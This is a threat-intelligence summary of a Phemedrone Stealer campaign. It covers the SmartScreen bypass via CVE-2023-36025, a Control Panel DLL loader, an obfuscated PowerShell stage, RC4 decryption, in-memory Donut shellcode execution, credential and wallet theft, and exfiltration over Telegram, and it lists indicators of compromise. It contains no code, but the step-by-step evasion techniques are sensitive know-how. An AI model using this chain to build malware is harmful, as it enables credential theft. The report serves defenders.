Keypoints
- Attackers host malicious Internet Shortcut (.url) files on cloud services (Discord, FileTransfer.io) and use CVE-2023-36025 to bypass Windows Defender SmartScreen prompts.
- The .url file downloads a .cpl (Control Panel DLL) which is executed via control.exe and rundll32.exe to run a first-stage loader that invokes PowerShell.
- The PowerShell second-stage loader (DATA3.txt) is obfuscated and stages an encrypted payload (secure.pdf) that is RC4-decrypted using SystemFunction032 from advapi32.dll.
- The loader uses ActiveDS memory allocation functions and VirtualProtect, then triggers execution of the decrypted shellcode via an API callback (CryptCATCDFOpen) to run the second-stage code in memory.
- Attackers embed Donut shellcode to load and run a .NET assembly in-memory via Unmanaged CLR Hosting, avoiding disk-based artifacts.
- Phemedrone decrypts configuration (RijndaelManaged), enforces a mutex (5dad16bd-6884-4ab8-b182-a504b4c99bcf), collects browser credentials, crypto wallets, app tokens, system info, compresses results, and exfiltrates via Telegram bot API (sendDocument) after validating the token.
MITRE Techniques
- [T1218.002] Signed Binary Proxy Execution: Abuse of Windows Control Panel binary (control.exe) to execute .cpl files β βThreat actors leverage MITRE ATT&CK technique T1218.002, which abuses the Windows Control Panel process binary (control.exe) to execute .cpl files.β
Indicators of Compromise
- [File names] Stage and payload files β DATA3.txt (obfuscated PowerShell loader), secure.pdf (encrypted second-stage loader).
- [File extensions] Malicious shortcut and payload types β .url (malicious Internet Shortcut used to exploit SmartScreen), .cpl (malicious Control Panel DLL executed via control.exe), and DLLs executed via rundll32.exe.
- [Mutex] Runtime synchronization β mutex value detected: 5dad16bd-6884-4ab8-b182-a504b4c99bcf (used to prevent multiple instances).
- [Hosting/services] Delivery and staging platforms β Discord-hosted links, FileTransfer.io, GitHub (staged payloads), and URL shorteners such as shorturl.at.
- [Exfiltration channel] Telegram bot usage β decrypted Telegram API token and chat ID used to validate via getMe and to send compressed ZIP via the sendDocument API endpoint.
The technical infection chain begins when a user opens a cloud-hosted .url Internet Shortcut crafted to exploit CVE-2023-36025, bypassing Windows Defender SmartScreen. That shortcut downloads a .cpl file; attackers execute this Control Panel DLL via control.exe and rundll32.exe, which acts as a loader that launches PowerShell to retrieve an obfuscated second-stage script named DATA3.txt from a remote host (commonly GitHub). DATA3.txt uses string and digit manipulation to hinder static analysis and then stages an encrypted payload file (secure.pdf).
Secure.pdf is decrypted using the undocumented SystemFunction032 API (performing RC4), after which the loader allocates and relocates the decrypted buffer with Activeds.dll functions (AllocADsMem/ReallocADsMem) and sets execution permissions via VirtualProtect. Execution is transferred to the second-stage shellcode through an API callback (CryptCATCDFOpen with PFN_CDF_PARSE_ERROR_CALLBACK), which runs the embedded Donut shellcode. Donut is configured to decrypt (Chaskey) and load the .NET assembly in memory by hosting the CLR via the Unmanaged CLR Hosting API, creating an AppDomain and invoking the payload entry pointβavoiding writing the main payload to disk.
The in-memory Phemedrone payload decrypts its configuration (RijndaelManaged), checks a mutex (5dad16bd-β¦), and spawns service threads discovered via reflection to harvest browser credentials, crypto wallet files, Discord/Telegram artifacts, FileZilla configs, Steam files, system/hardware/geolocation info, and screenshots. Collected data are compressed in-memory using MemoryStream and ZipStorage, the Telegram token is validated via getMe, and the ZIP is exfiltrated to the attacker via the Telegram sendDocument API with multipart/form-data POSTs. Persistence mechanisms observed include scheduled tasks to maintain execution.